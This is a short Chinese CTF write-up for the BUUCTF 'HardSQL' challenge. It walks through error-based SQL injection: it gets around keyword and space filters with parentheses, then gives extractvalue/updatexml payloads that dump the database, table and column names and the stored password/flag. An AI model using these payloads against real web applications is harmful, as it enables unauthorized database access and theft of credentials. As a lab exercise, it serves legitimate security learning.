BUUCTF-[极客大挑战 2019]HardSQL(报错注入)
Posted wrnan
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了BUUCTF-[极客大挑战 2019]HardSQL(报错注入)相关的知识,希望对你有一定的参考价值。
1、用bp fuzz后,union|order by|等号|空格|substr等被过滤,空格没有被过滤,大致有个印象
2、爆当前的数据库名:
空格绕过:用括号()包起来就行
‘or(extractvalue(1,concat(‘~‘,database())))#
用updatexml()函数是一样的:
‘or(updatexml(1,concat(‘~‘,database()),1))#
‘or(extractvalue(1,concat(‘~‘,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like("geek")))))#
‘or(extractvalue(1,concat(‘~‘,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like("H4rDsq1")))))#
‘or(extractvalue(1,concat(‘~‘,(select(password)from(H4rDsq1)))))#
flag{f5629ada-833f-4eb8-a6f2-49
没出全
这时候就要想到mysql的一些函数,substr,left,right
注意:substr被过滤了
‘or(extractvalue(1,concat(‘~‘,(select(right(password,20))from(H4rDsq1)))))#
以上是关于BUUCTF-[极客大挑战 2019]HardSQL(报错注入)的主要内容,如果未能解决你的问题,请参考以下文章